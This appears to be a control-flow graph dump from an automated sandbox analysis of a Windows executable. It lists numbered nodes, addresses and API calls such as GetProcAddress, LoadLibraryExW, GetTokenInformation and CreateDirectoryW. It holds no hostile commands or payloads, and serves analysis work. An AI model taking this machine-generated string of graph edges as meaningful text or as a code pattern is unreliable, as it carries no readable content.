17838->17844 17840 7ff6aae34f08 memcpy_s 11 API calls 17839->17840 17839->17844 17842 7ff6aae31669 17840->17842 17843 7ff6aae313ca 17841->17843 17845 7ff6aae3a8e0 _invalid_parameter_noinfo 37 API calls 17842->17845 17846 7ff6aae3a8e0 _invalid_parameter_noinfo 37 API calls 17843->17846 17844->17518 17845->17844 17846->17839 17848 7ff6aae30704 17847->17848 17875 7ff6aae30464 17848->17875 17850 7ff6aae3071d 17850->17173 17887 7ff6aae303bc 17851->17887 17855 7ff6aae2c850 17854->17855 17856 7ff6aae22930 GetCurrentProcessId 17855->17856 17857 7ff6aae21c80 49 API calls 17856->17857 17858 7ff6aae22979 17857->17858 17901 7ff6aae34984 17858->17901 17863 7ff6aae21c80 49 API calls 17864 7ff6aae229ff 17863->17864 17931 7ff6aae22620 17864->17931 17867 7ff6aae2c550 _log10_special 8 API calls 17868 7ff6aae22a31 17867->17868 17868->17212 17870 7ff6aae30119 17869->17870 17871 7ff6aae21b89 17869->17871 17872 7ff6aae34f08 memcpy_s 11 API calls 17870->17872 17871->17211 17871->17212 17873 7ff6aae3011e 17872->17873 17874 7ff6aae3a8e0 _invalid_parameter_noinfo 37 API calls 17873->17874 17874->17871 17876 7ff6aae304ce 17875->17876 17877 7ff6aae3048e 17875->17877 17876->17877 17879 7ff6aae304da 17876->17879 17878 7ff6aae3a814 _invalid_parameter_noinfo 37 API calls 17877->17878 17880 7ff6aae304b5 17878->17880 17886 7ff6aae3546c EnterCriticalSection 17879->17886 17880->17850 17888 7ff6aae21a20 17887->17888 17889 7ff6aae303e6 17887->17889 17888->17181 17888->17182 17889->17888 17890 7ff6aae303f5 memcpy_s 17889->17890 17891 7ff6aae30432 17889->17891 17894 7ff6aae34f08 memcpy_s 11 API calls 17890->17894 17900 7ff6aae3546c EnterCriticalSection 17891->17900 17896 7ff6aae3040a 17894->17896 17898 7ff6aae3a8e0 _invalid_parameter_noinfo 37 API calls 17896->17898 17898->17888 17902 7ff6aae349de 17901->17902 17903 7ff6aae34a03 17902->17903 17905 7ff6aae34a3f 17902->17905 17904 7ff6aae3a814 _invalid_parameter_noinfo 37 API calls 17903->17904 17910 7ff6aae34a2d 17904->17910 17940 7ff6aae32c10 17905->17940 17907 7ff6aae34b1c 17909 7ff6aae3a948 __free_lconv_num 11 API calls 17907->17909 17908 7ff6aae2c550 _log10_special 8 API calls 17911 7ff6aae229c3 17908->17911 17909->17910 17910->17908 17919 7ff6aae35160 17911->17919 17913 7ff6aae34af1 17916 7ff6aae3a948 __free_lconv_num 11 API calls 17913->17916 17914 7ff6aae34b40 17914->17907 17915 7ff6aae34b4a 17914->17915 17918 7ff6aae3a948 __free_lconv_num 11 API calls 17915->17918 17916->17910 17917 7ff6aae34ae8 17917->17907 17917->17913 17918->17910 17920 7ff6aae3b2c8 memcpy_s 11 API calls 17919->17920 17921 7ff6aae35177 17920->17921 17922 7ff6aae229e5 17921->17922 17923 7ff6aae3eb98 memcpy_s 11 API calls 17921->17923 17926 7ff6aae351b7 17921->17926 17922->17863 17924 7ff6aae351ac 17923->17924 17925 7ff6aae3a948 __free_lconv_num 11 API calls 17924->17925 17925->17926 17926->17922 18078 7ff6aae3ec20 17926->18078 17929 7ff6aae3a900 _isindst 17 API calls 17930 7ff6aae351fc 17929->17930 17932 7ff6aae2262f 17931->17932 17933 7ff6aae29390 2 API calls 17932->17933 17934 7ff6aae22660 17933->17934 17935 7ff6aae2266f MessageBoxW 17934->17935 17936 7ff6aae22683 MessageBoxA 17934->17936 17937 7ff6aae22690 17935->17937 17936->17937 17938 7ff6aae2c550 _log10_special 8 API calls 17937->17938 17939 7ff6aae226a0 17938->17939 17939->17867 17941 7ff6aae32c4e 17940->17941 17942 7ff6aae32c3e 17940->17942 17943 7ff6aae32c57 17941->17943 17950 7ff6aae32c85 17941->17950 17945 7ff6aae3a814 _invalid_parameter_noinfo 37 API calls 17942->17945 17946 7ff6aae3a814 _invalid_parameter_noinfo 37 API calls 17943->17946 17944 7ff6aae32c7d 17944->17907 17944->17913 17944->17914 17944->17917 17945->17944 17946->17944 17947 7ff6aae347c0 45 API calls 17947->17950 17949 7ff6aae32f34 17952 7ff6aae3a814 _invalid_parameter_noinfo 37 API calls 17949->17952 17950->17942 17950->17944 17950->17947 17950->17949 17954 7ff6aae335a0 17950->17954 17980 7ff6aae33268 17950->17980 18010 7ff6aae32af0 17950->18010 17952->17942 17955 7ff6aae33655 17954->17955 17956 7ff6aae335e2 17954->17956 17959 7ff6aae3365a 17955->17959 17960 7ff6aae336af 17955->17960 17957 7ff6aae335e8 17956->17957 17958 7ff6aae3367f 17956->17958 17967 7ff6aae335ed 17957->17967 17971 7ff6aae336be 17957->17971 18027 7ff6aae31b50 17958->18027 17961 7ff6aae3365c 17959->17961 17962 7ff6aae3368f 17959->17962 17960->17958 17960->17971 17978 7ff6aae33618 17960->17978 17964 7ff6aae335fd 17961->17964 17970 7ff6aae3366b 17961->17970 18034 7ff6aae31740 17962->18034 17979 7ff6aae336ed 17964->17979 18013 7ff6aae33f04 17964->18013 17967->17964 17969 7ff6aae33630 17967->17969 17967->17978 17969->17979 18023 7ff6aae343c0 17969->18023 17970->17958 17973 7ff6aae33670 17970->17973 17971->17979 18041 7ff6aae31f60 17971->18041 17975 7ff6aae34558 37 API calls 17973->17975 17973->17979 17974 7ff6aae2c550 _log10_special 8 API calls 17976 7ff6aae33983 17974->17976 17975->17978 17976->17950 17978->17979 18048 7ff6aae3e858 17978->18048 17979->17974 17981 7ff6aae33289 17980->17981 17982 7ff6aae33273 17980->17982 17985 7ff6aae3a814 _invalid_parameter_noinfo 37 API calls 17981->17985 17986 7ff6aae332c7 17981->17986 17983 7ff6aae33655 17982->17983 17984 7ff6aae335e2 17982->17984 17982->17986 17989 7ff6aae3365a 17983->17989 17990 7ff6aae336af 17983->17990 17987 7ff6aae335e8 17984->17987 17988 7ff6aae3367f 17984->17988 17985->17986 17986->17950 17997 7ff6aae335ed 17987->17997 17999 7ff6aae336be 17987->17999 17993 7ff6aae31b50 38 API calls 17988->17993 17991 7ff6aae3365c 17989->17991 17992 7ff6aae3368f 17989->17992 17990->17988 17990->17999 18007 7ff6aae33618 17990->18007 17994 7ff6aae335fd 17991->17994 18001 7ff6aae3366b 17991->18001 17995 7ff6aae31740 38 API calls 17992->17995 17993->18007 17996 7ff6aae33f04 47 API calls 17994->17996 18009 7ff6aae336ed 17994->18009 17995->18007 17996->18007 17997->17994 17998 7ff6aae33630 17997->17998 17997->18007 18002 7ff6aae343c0 47 API calls 17998->18002 17998->18009 18000 7ff6aae31f60 38 API calls 17999->18000 17999->18009 18000->18007 18001->17988 18003 7ff6aae33670 18001->18003 18002->18007 18005 7ff6aae34558 37 API calls 18003->18005 18003->18009 18004 7ff6aae2c550 _log10_special 8 API calls 18006 7ff6aae33983 18004->18006 18005->18007 18006->17950 18008 7ff6aae3e858 47 API calls 18007->18008 18007->18009 18008->18007 18009->18004 18061 7ff6aae30d14 18010->18061 18014 7ff6aae33f26 18013->18014 18015 7ff6aae30b80 12 API calls 18014->18015 18016 7ff6aae33f6e 18015->18016 18017 7ff6aae3e570 46 API calls 18016->18017 18018 7ff6aae34041 18017->18018 18019 7ff6aae34063 18018->18019 18020 7ff6aae347c0 45 API calls 18018->18020 18021 7ff6aae347c0 45 API calls 18019->18021 18022 7ff6aae340ec 18019->18022 18020->18019 18021->18022 18022->17978 18024 7ff6aae34440 18023->18024 18025 7ff6aae343d8 18023->18025 18024->17978 18025->18024 18026 7ff6aae3e858 47 API calls 18025->18026 18026->18024 18029 7ff6aae31b83 18027->18029 18028 7ff6aae31bb2 18030 7ff6aae30b80 12 API calls 18028->18030 18033 7ff6aae31bef 18028->18033 18029->18028 18031 7ff6aae31c6f 18029->18031 18030->18033 18032 7ff6aae3a814 _invalid_parameter_noinfo 37 API calls 18031->18032 18032->18033 18033->17978 18035 7ff6aae31773 18034->18035 18036 7ff6aae317a2 18035->18036 18038 7ff6aae3185f 18035->18038 18037 7ff6aae30b80 12 API calls 18036->18037 18040 7ff6aae317df 18036->18040 18037->18040 18039 7ff6aae3a814 _invalid_parameter_noinfo 37 API calls 18038->18039 18039->18040 18040->17978 18042 7ff6aae31f93 18041->18042 18043 7ff6aae31fc2 18042->18043 18045 7ff6aae3207f 18042->18045 18044 7ff6aae30b80 12 API calls 18043->18044 18047 7ff6aae31fff 18043->18047 18044->18047 18046 7ff6aae3a814 _invalid_parameter_noinfo 37 API calls 18045->18046 18046->18047 18047->17978 18049 7ff6aae3e880 18048->18049 18050 7ff6aae3e8c5 18049->18050 18051 7ff6aae347c0 45 API calls 18049->18051 18052 7ff6aae3e885 memcpy_s 18049->18052 18054 7ff6aae3e8ae memcpy_s 18049->18054 18050->18052 18050->18054 18058 7ff6aae407e8 18050->18058 18051->18050 18052->17978 18053 7ff6aae3a814 _invalid_parameter_noinfo 37 API calls 18053->18052 18054->18052 18054->18053 18060 7ff6aae4080c WideCharToMultiByte 18058->18060 18062 7ff6aae30d41 18061->18062 18063 7ff6aae30d53 18061->18063 18064 7ff6aae34f08 memcpy_s 11 API calls 18062->18064 18066 7ff6aae30d60 18063->18066 18069 7ff6aae30d9d 18063->18069 18065 7ff6aae30d46 18064->18065 18068 7ff6aae3a8e0 _invalid_parameter_noinfo 37 API calls 18065->18068 18067 7ff6aae3a814 _invalid_parameter_noinfo 37 API calls 18066->18067 18076 7ff6aae30d51 18067->18076 18068->18076 18070 7ff6aae30e46 18069->18070 18071 7ff6aae34f08 memcpy_s 11 API calls 18069->18071 18072 7ff6aae34f08 memcpy_s 11 API calls 18070->18072 18070->18076 18073 7ff6aae30e3b 18071->18073 18074 7ff6aae30ef0 18072->18074 18075 7ff6aae3a8e0 _invalid_parameter_noinfo 37 API calls 18073->18075 18077 7ff6aae3a8e0 _invalid_parameter_noinfo 37 API calls 18074->18077 18075->18070 18076->17950 18077->18076 18081 7ff6aae3ec3d 18078->18081 18079 7ff6aae3ec42 18080 7ff6aae34f08 memcpy_s 11 API calls 18079->18080 18084 7ff6aae351dd 18079->18084 18086 7ff6aae3ec4c 18080->18086 18081->18079 18083 7ff6aae3ec8c 18081->18083 18081->18084 18082 7ff6aae3a8e0 _invalid_parameter_noinfo 37 API calls 18082->18084 18083->18084 18085 7ff6aae34f08 memcpy_s 11 API calls 18083->18085 18084->17922 18084->17929 18085->18086 18086->18082 18088 7ff6aae26375 18087->18088 18089 7ff6aae21c80 49 API calls 18088->18089 18090 7ff6aae263b1 18089->18090 18091 7ff6aae263ba 18090->18091 18092 7ff6aae263dd 18090->18092 18093 7ff6aae22710 54 API calls 18091->18093 18094 7ff6aae24630 49 API calls 18092->18094 18110 7ff6aae263d3 18093->18110 18095 7ff6aae263f5 18094->18095 18096 7ff6aae26413 18095->18096 18097 7ff6aae22710 54 API calls 18095->18097 18177 7ff6aae24560 18096->18177 18097->18096 18099 7ff6aae2c550 _log10_special 8 API calls 18100 7ff6aae2336e 18099->18100 18100->17239 18118 7ff6aae26500 18100->18118 18102 7ff6aae2642b 18104 7ff6aae24630 49 API calls 18102->18104 18103 7ff6aae28e80 3 API calls 18103->18102 18105 7ff6aae26444 18104->18105 18106 7ff6aae26469 18105->18106 18107 7ff6aae26449 18105->18107 18183 7ff6aae28e80 18106->18183 18108 7ff6aae22710 54 API calls 18107->18108 18108->18110 18110->18099 18111 7ff6aae26476 18277 7ff6aae25400 18118->18277 18120 7ff6aae26526 18121 7ff6aae2653f 18120->18121 18122 7ff6aae2652e 18120->18122 18284 7ff6aae24c90 18121->18284 18123 7ff6aae22710 54 API calls 18122->18123 18129 7ff6aae2653a 18123->18129 18126 7ff6aae2654b 18128 7ff6aae22710 54 API calls 18126->18128 18127 7ff6aae2655c 18130 7ff6aae2656c 18127->18130 18132 7ff6aae2657d 18127->18132 18128->18129 18129->17235 18131 7ff6aae22710 54 API calls 18130->18131 18131->18129 18133 7ff6aae265ad 18132->18133 18134 7ff6aae2659c 18132->18134 18136 7ff6aae265cd 18133->18136 18137 7ff6aae265bc 18133->18137 18135 7ff6aae22710 54 API calls 18134->18135 18135->18129 18156 7ff6aae26070 18155->18156 18156->18156 18157 7ff6aae26099 18156->18157 18161 7ff6aae260b0 __vcrt_freefls 18156->18161 18158 7ff6aae22710 54 API calls 18157->18158 18159 7ff6aae260a5 18158->18159 18159->17237 18162 7ff6aae22710 54 API calls 18161->18162 18163 7ff6aae261bb 18161->18163 18385 7ff6aae21470 18161->18385 18162->18161 18163->17237 18178 7ff6aae2456a 18177->18178 18179 7ff6aae29390 2 API calls 18178->18179 18180 7ff6aae2458f 18179->18180 18181 7ff6aae2c550 _log10_special 8 API calls 18180->18181 18182 7ff6aae245b7 18181->18182 18182->18102 18182->18103 18184 7ff6aae29390 2 API calls 18183->18184 18185 7ff6aae28e94 LoadLibraryExW 18184->18185 18186 7ff6aae28eb3 __vcrt_freefls 18185->18186 18186->18111 18279 7ff6aae2542c 18277->18279 18278 7ff6aae25434 18278->18120 18279->18278 18282 7ff6aae255d4 18279->18282 18308 7ff6aae36aa4 18279->18308 18280 7ff6aae25797 __vcrt_freefls 18280->18120 18281 7ff6aae247d0 47 API calls 18281->18282 18282->18280 18282->18281 18285 7ff6aae24cc0 18284->18285 18286 7ff6aae2c550 _log10_special 8 API calls 18285->18286 18287 7ff6aae24d2a 18286->18287 18287->18126 18287->18127 18309 7ff6aae36ad4 18308->18309 18312 7ff6aae35fa0 18309->18312 18311 7ff6aae36b04 18311->18279 18313 7ff6aae35fd1 18312->18313 18314 7ff6aae35fe3 18312->18314 18316 7ff6aae34f08 memcpy_s 11 API calls 18313->18316 18315 7ff6aae3602d 18314->18315 18317 7ff6aae35ff0 18314->18317 18318 7ff6aae36048 18315->18318 18322 7ff6aae347c0 45 API calls 18315->18322 18319 7ff6aae35fd6 18316->18319 18321 7ff6aae3a814 _invalid_parameter_noinfo 37 API calls 18317->18321 18324 7ff6aae3606a 18318->18324 18333 7ff6aae36a2c 18318->18333 18320 7ff6aae3a8e0 _invalid_parameter_noinfo 37 API calls 18319->18320 18332 7ff6aae35fe1 18320->18332 18321->18332 18322->18318 18325 7ff6aae3610b 18324->18325 18327 7ff6aae34f08 memcpy_s 11 API calls 18324->18327 18326 7ff6aae34f08 memcpy_s 11 API calls 18325->18326 18325->18332 18328 7ff6aae361b6 18326->18328 18329 7ff6aae36100 18327->18329 18331 7ff6aae3a8e0 _invalid_parameter_noinfo 37 API calls 18328->18331 18330 7ff6aae3a8e0 _invalid_parameter_noinfo 37 API calls 18329->18330 18330->18325 18331->18332 18332->18311 18334 7ff6aae36a4f 18333->18334 18336 7ff6aae36a66 18333->18336 18339 7ff6aae3ff68 18334->18339 18337 7ff6aae36a54 18336->18337 18344 7ff6aae3ff98 18336->18344 18337->18318 18340 7ff6aae3b150 _CreateFrameInfo 45 API calls 18339->18340 18341 7ff6aae3ff71 18340->18341 18345 7ff6aae34f4c 45 API calls 18344->18345 18346 7ff6aae3ffd1 18345->18346 18386 7ff6aae245c0 108 API calls 18385->18386 18457 7ff6aae38258 18456->18457 18458 7ff6aae38245 18456->18458 18466 7ff6aae37ebc 18457->18466 18459 7ff6aae34f08 memcpy_s 11 API calls 18458->18459 18461 7ff6aae3824a 18459->18461 18463 7ff6aae3a8e0 _invalid_parameter_noinfo 37 API calls 18461->18463 18465 7ff6aae38256 18463->18465 18465->17248 18473 7ff6aae402d8 EnterCriticalSection 18466->18473 18477 7ff6aae35ec8 18474->18477 18475 7ff6aae35eee 18476 7ff6aae34f08 memcpy_s 11 API calls 18475->18476 18478 7ff6aae35ef3 18476->18478 18477->18475 18479 7ff6aae35f21 18477->18479 18480 7ff6aae3a8e0 _invalid_parameter_noinfo 37 API calls 18478->18480 18481 7ff6aae35f27 18479->18481 18482 7ff6aae35f34 18479->18482 18484 7ff6aae24616 18480->18484 18485 7ff6aae34f08 memcpy_s 11 API calls 18481->18485 18493 7ff6aae3ac28 18482->18493 18484->17257 18485->18484 18506 7ff6aae402d8 EnterCriticalSection 18493->18506 18867 7ff6aae378f8 18866->18867 18870 7ff6aae373d4 18867->18870 18869 7ff6aae37911 18869->17267 18871 7ff6aae3741e 18870->18871 18872 7ff6aae373ef 18870->18872 18880 7ff6aae3546c EnterCriticalSection 18871->18880 18873 7ff6aae3a814 _invalid_parameter_noinfo 37 API calls 18872->18873 18875 7ff6aae3740f 18873->18875 18875->18869 18882 7ff6aae2fe71 18881->18882 18883 7ff6aae2fe43 18881->18883 18884 7ff6aae2fe63 18882->18884 18891 7ff6aae3546c EnterCriticalSection 18882->18891 18885 7ff6aae3a814 _invalid_parameter_noinfo 37 API calls 18883->18885 18884->17271 18885->18884 18893 7ff6aae285b1 GetTokenInformation 18892->18893 18896 7ff6aae28633 __vcrt_freefls 18892->18896 18894 7ff6aae285d2 GetLastError 18893->18894 18895 7ff6aae285dd 18893->18895 18894->18895 18894->18896 18895->18896 18899 7ff6aae285f9 GetTokenInformation 18895->18899 18897 7ff6aae28646 CloseHandle 18896->18897 18898 7ff6aae2864c 18896->18898 18897->18898 18898->17294 18899->18896 18900 7ff6aae2861c 18899->18900 18900->18896 18901 7ff6aae28626 ConvertSidToStringSidW 18900->18901 18901->18896 18903 7ff6aae2c850 18902->18903 18904 7ff6aae22b74 GetCurrentProcessId 18903->18904 18905 7ff6aae226b0 48 API calls 18904->18905 18906 7ff6aae22bc7 18905->18906 18907 7ff6aae34bd8 48 API calls 18906->18907 18908 7ff6aae22c10 MessageBoxW 18907->18908 18909 7ff6aae2c550 _log10_special 8 API calls 18908->18909 18910 7ff6aae22c40 18909->18910 18910->17305 18912 7ff6aae281dc 18911->18912 18913 7ff6aae29390 2 API calls 18912->18913 18914 7ff6aae281fb 18913->18914 18915 7ff6aae28216 ExpandEnvironmentStringsW 18914->18915 18916 7ff6aae28203 18914->18916 18918 7ff6aae2823c __vcrt_freefls 18915->18918 18917 7ff6aae22810 49 API calls 18916->18917 18919 7ff6aae2820f __vcrt_freefls 18917->18919 18920 7ff6aae28240 18918->18920 18921 7ff6aae28253 18918->18921 18922 7ff6aae2c550 _log10_special 8 API calls 18919->18922 18923 7ff6aae22810 49 API calls 18920->18923 18925 7ff6aae282bf 18921->18925 18927 7ff6aae28261 GetDriveTypeW 18921->18927 18924 7ff6aae283af 18922->18924 18923->18919 18924->17319 18924->17337 18926 7ff6aae37e08 45 API calls 18925->18926 18931 7ff6aae282d1 18926->18931 18929 7ff6aae282b0 18927->18929 18930 7ff6aae28295 18927->18930 18950 7ff6aae3796c 18929->18950 18932 7ff6aae22810 49 API calls 18930->18932 18934 7ff6aae282d9 18931->18934 18936 7ff6aae282ec 18931->18936 18932->18919 18935 7ff6aae22810 49 API calls 18934->18935 18935->18919 18937 7ff6aae2834e CreateDirectoryW 18936->18937 18938 7ff6aae226b0 48 API calls 18936->18938 18937->18919 18939 7ff6aae2835d GetLastError 18937->18939 18940 7ff6aae28328 CreateDirectoryW 18938->18940 18939->18919 18941 7ff6aae2836a GetLastError 18939->18941 18940->18936 18942 7ff6aae22c50 51 API calls 18941->18942 18942->18919 18944 7ff6aae225e5 18943->18944 18945 7ff6aae34bd8 48 API calls 18944->18945 18946 7ff6aae22604 18945->18946 18946->17317 18966 7ff6aae38794 18947->18966 18951 7ff6aae3798a 18950->18951 18954 7ff6aae379bd 18950->18954 18951->18954 18957 7ff6aae40474 18951->18957 18954->18919 18955 7ff6aae3a900 _isindst 17 API calls 18956 7ff6aae379ed 18955->18956 18958 7ff6aae40481 18957->18958 18959 7ff6aae4048b 18957->18959 18958->18959 18964 7ff6aae404a7 18958->18964 18960 7ff6aae34f08 memcpy_s 11 API calls 18959->18960 18961 7ff6aae40493 18960->18961 18963 7ff6aae3a8e0 _invalid_parameter_noinfo 37 API calls 18961->18963 18962 7ff6aae379b9 18962->18954 18962->18955 18963->18962 18964->18962 18965 7ff6aae34f08 memcpy_s 11 API calls 18964->18965 18965->18961 19007 7ff6aae41558 18966->19007 19066 7ff6aae412d0 19007->19066 19087 7ff6aae402d8 EnterCriticalSection 19066->19087 19091 7ff6aae21865 19089->19091 19092 7ff6aae218d5 19089->19092 19091->19092 19152 7ff6aae35024 19091->19152 19092->17381 19094 7ff6aae27e2e 19093->19094 19095 7ff6aae21c80 49 API calls 19094->19095 19098 7ff6aae27f52 19094->19098 19101 7ff6aae27eb5 19095->19101 19096 7ff6aae2c550 _log10_special 8 API calls 19097 7ff6aae27f83 19096->19097 19097->17381 19098->19096 19099 7ff6aae21c80 49 API calls 19099->19101 19100 7ff6aae24560 10 API calls 19100->19101 19101->19098 19101->19099 19101->19100 19102 7ff6aae29390 2 API calls 19101->19102 19103 7ff6aae27f23 CreateDirectoryW 19102->19103 19103->19098 19103->19101 19105 7ff6aae21637 19104->19105 19106 7ff6aae21613 19104->19106 19108 7ff6aae245c0 108 API calls 19105->19108 19167 7ff6aae21050 19106->19167 19110 7ff6aae2164b 19108->19110 19109 7ff6aae21618 19111 7ff6aae2162e 19109->19111 19115 7ff6aae22710 54 API calls 19109->19115 19112 7ff6aae21653 19110->19112 19113 7ff6aae21682 19110->19113 19111->17381 19116 7ff6aae34f08 memcpy_s 11 API calls 19112->19116 19114 7ff6aae245c0 108 API calls 19113->19114 19117 7ff6aae21696 19114->19117 19115->19111 19118 7ff6aae21658 19116->19118 19119 7ff6aae216b8 19117->19119 19120 7ff6aae2169e 19117->19120 19121 7ff6aae22910 54 API calls 19118->19121 19123 7ff6aae306d4 73 API calls 19119->19123 19122 7ff6aae22710 54 API calls 19120->19122 19124 7ff6aae21671 19121->19124 19125 7ff6aae216ae 19122->19125 19126 7ff6aae216cd 19123->19126 19124->17381 19129 7ff6aae3004c 74 API calls 19125->19129 19127 7ff6aae216f9 19126->19127 19128 7ff6aae216d1 19126->19128 19131 7ff6aae21717 19127->19131 19132 7ff6aae216ff 19127->19132 19130 7ff6aae34f08 memcpy_s 11 API calls 19128->19130 19133 7ff6aae21829 19129->19133 19134 7ff6aae216d6 19130->19134 19137 7ff6aae21739 19131->19137 19138 7ff6aae21761 19131->19138 19135 7ff6aae21210 92 API calls 19132->19135 19133->17381 19144 7ff6aae216ef __vcrt_freefls 19135->19144 19140 7ff6aae34f08 memcpy_s 11 API calls 19137->19140 19143 7ff6aae3039c _fread_nolock 53 API calls 19138->19143 19138->19144 19145 7ff6aae217da 19138->19145 19147 7ff6aae30adc 76 API calls 19138->19147 19149 7ff6aae217c5 19138->19149 19143->19138 19147->19138 19153 7ff6aae35031 19152->19153 19154 7ff6aae3505e 19152->19154 19155 7ff6aae34f08 memcpy_s 11 API calls 19153->19155 19163 7ff6aae34fe8 19153->19163 19156 7ff6aae35081 19154->19156 19157 7ff6aae3509d 19154->19157 19158 7ff6aae3503b 19155->19158 19159 7ff6aae34f08 memcpy_s 11 API calls 19156->19159 19160 7ff6aae34f4c 45 API calls 19157->19160 19161 7ff6aae3a8e0 _invalid_parameter_noinfo 37 API calls 19158->19161 19162 7ff6aae35086 19159->19162 19166 7ff6aae35091 19160->19166 19165 7ff6aae35046 19161->19165 19164 7ff6aae3a8e0 _invalid_parameter_noinfo 37 API calls 19162->19164 19163->19091 19164->19166 19165->19091 19166->19091 19168 7ff6aae245c0 108 API calls 19167->19168 19169 7ff6aae2108c 19168->19169 19170 7ff6aae210a9 19169->19170 19171 7ff6aae21094 19169->19171 19172 7ff6aae306d4 73 API calls 19170->19172 19173 7ff6aae22710 54 API calls 19171->19173 19174 7ff6aae210bf 19172->19174 19179 7ff6aae210a4 __vcrt_freefls 19173->19179 19175 7ff6aae210e6 19174->19175 19176 7ff6aae210c3 19174->19176 19181 7ff6aae210f7 19175->19181 19182 7ff6aae21122 19175->19182 19177 7ff6aae34f08 memcpy_s 11 API calls 19176->19177 19178 7ff6aae210c8 19177->19178 19180 7ff6aae22910 54 API calls 19178->19180 19179->19109 19197 7ff6aae210e1 __vcrt_freefls 19180->19197 19184 7ff6aae34f08 memcpy_s 11 API calls 19181->19184 19183 7ff6aae21129 19182->19183 19193 7ff6aae2113c 19182->19193 19185 7ff6aae21210 92 API calls 19183->19185 19186 7ff6aae21100 19184->19186 19185->19197 19188 7ff6aae22910 54 API calls 19186->19188 19187 7ff6aae3004c 74 API calls 19188->19197 19190 7ff6aae3039c _fread_nolock 53 API calls 19190->19193 19192 7ff6aae211ed 19194 7ff6aae34f08 memcpy_s 11 API calls 19192->19194 19193->19190 19193->19192 19193->19197 19197->19187 19213 7ff6aae276e9 GetLastError 19212->19213 19214 7ff6aae2771b GetProcAddress 19212->19214 19215 7ff6aae276f6 19213->19215 19216 7ff6aae27737 GetLastError 19214->19216 19217 7ff6aae27746 GetProcAddress 19214->19217 19218 7ff6aae22c50 51 API calls 19215->19218 19216->19215 19219 7ff6aae27771 GetProcAddress 19217->19219 19220 7ff6aae27762 GetLastError 19217->19220 19221 7ff6aae2770b 19218->19221 19222 7ff6aae2778d GetLastError 19219->19222 19223 7ff6aae2779f GetProcAddress 19219->19223 19220->19215 19221->17393 19222->19215 19224 7ff6aae277bb GetLastError 19223->19224 19225 7ff6aae277cd GetProcAddress 19223->19225 19224->19215 19226 7ff6aae277e9 GetLastError 19225->19226 19227 7ff6aae277fb GetProcAddress 19225->19227 19226->19215 19228 7ff6aae27817 GetLastError 19227->19228 19229 7ff6aae27829 GetProcAddress 19227->19229 19228->19229 19282->17414 19285 7ff6aae2718b 19284->19285 19287 7ff6aae27144 19284->19287 19285->17430 19286 7ff6aae35024 45 API calls 19286->19287 19287->19285 19287->19286 19289 7ff6aae241a1 19288->19289 19290 7ff6aae244e0 49 API calls 19289->19290 19291 7ff6aae241db 19290->19291 19292 7ff6aae244e0 49 API calls 19291->19292 19293 7ff6aae241eb 19292->19293 19294 7ff6aae2420d 19293->19294 19295 7ff6aae2423c 19293->19295 19335 7ff6aae24110 19294->19335 19296 7ff6aae24110 51 API calls 19295->19296 19298 7ff6aae2423a 19296->19298 19299 7ff6aae24267 19298->19299 19300 7ff6aae2429c 19298->19300 19342 7ff6aae27cf0 19299->19342 19302 7ff6aae24110 51 API calls 19300->19302 19304 7ff6aae242c0 19302->19304 19307 7ff6aae24110 51 API calls 19304->19307 19313 7ff6aae24312 19304->19313 19305 7ff6aae24393 19308 7ff6aae21950 115 API calls 19305->19308 19306 7ff6aae22710 54 API calls 19310 7ff6aae24297 19306->19310 19311 7ff6aae242e9 19307->19311 19312 7ff6aae2439d 19308->19312 19309 7ff6aae2c550 _log10_special 8 API calls 19314 7ff6aae24435 19309->19314 19310->19309 19311->19313 19315 7ff6aae24110 51 API calls 19311->19315 19316 7ff6aae243fe 19312->19316 19317 7ff6aae243a5 19312->19317 19313->19305 19319 7ff6aae2438c 19313->19319 19321 7ff6aae24317 19313->19321 19323 7ff6aae2437b 19313->19323 19314->17430 19315->19313 19318 7ff6aae22710 54 API calls 19316->19318 19320 7ff6aae21840 45 API calls 19317->19320 19318->19321 19319->19317 19319->19321 19322 7ff6aae243b7 19320->19322 19324 7ff6aae22710 54 API calls 19321->19324 19325 7ff6aae243bc 19322->19325 19326 7ff6aae243d2 19322->19326 19327 7ff6aae22710 54 API calls 19323->19327 19324->19310 19328 7ff6aae22710 54 API calls 19325->19328 19329 7ff6aae21600 118 API calls 19326->19329 19327->19321 19328->19310 19330 7ff6aae243e0 19329->19330 19330->19310 19331 7ff6aae22710 54 API calls 19330->19331 19331->19310 19333 7ff6aae21c80 49 API calls 19332->19333 19334 7ff6aae24474 19333->19334 19334->17430 19336 7ff6aae24136 19335->19336 19337 7ff6aae34984 49 API calls 19336->19337 19338 7ff6aae2415c 19337->19338 19339 7ff6aae2416d 19338->19339 19340 7ff6aae24560 10 API calls 19338->19340 19339->19298 19341 7ff6aae2417f 19340->19341 19341->19298 19343 7ff6aae27d05 19342->19343 19344 7ff6aae245c0 108 API calls 19343->19344 19345 7ff6aae27d2b 19344->19345 19346 7ff6aae27d52 19345->19346 19347 7ff6aae245c0 108 API calls 19345->19347 19348 7ff6aae2c550 _log10_special 8 API calls 19346->19348 19349 7ff6aae27d42 19347->19349 19350 7ff6aae24277 19348->19350 19351 7ff6aae27d4d 19349->19351 19352 7ff6aae27d5c 19349->19352 19350->19306 19350->19310 19354 7ff6aae3004c 74 API calls 19351->19354 19368 7ff6aae300e4 19352->19368 19354->19346 19355 7ff6aae27dbf 19356 7ff6aae3004c 74 API calls 19355->19356 19358 7ff6aae27de7 19356->19358 19357 7ff6aae3039c _fread_nolock 53 API calls 19366 7ff6aae27d61 19357->19366 19360 7ff6aae27dc6 19361 7ff6aae30110 37 API calls 19360->19361 19363 7ff6aae27dc1 19361->19363 19362 7ff6aae30adc 76 API calls 19362->19366 19363->19355 19374 7ff6aae37318 19363->19374 19364 7ff6aae30110 37 API calls 19364->19366 19366->19355 19366->19357 19366->19360 19366->19362 19366->19363 19366->19364 19367 7ff6aae300e4 37 API calls 19366->19367 19367->19366 19369 7ff6aae300ed 19368->19369 19371 7ff6aae300fd 19368->19371 19370 7ff6aae34f08 memcpy_s 11 API calls 19369->19370 19372 7ff6aae300f2 19370->19372 19371->19366 19373 7ff6aae3a8e0 _invalid_parameter_noinfo 37 API calls 19372->19373 19373->19371 19375 7ff6aae37320 19374->19375 19394->17440 19396 7ff6aae3b150 _CreateFrameInfo 45 API calls 19395->19396 19397 7ff6aae3a3e1 19396->19397 19398 7ff6aae3a504 _CreateFrameInfo 45 API calls 19397->19398 19399 7ff6aae3a401 19398->19399

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
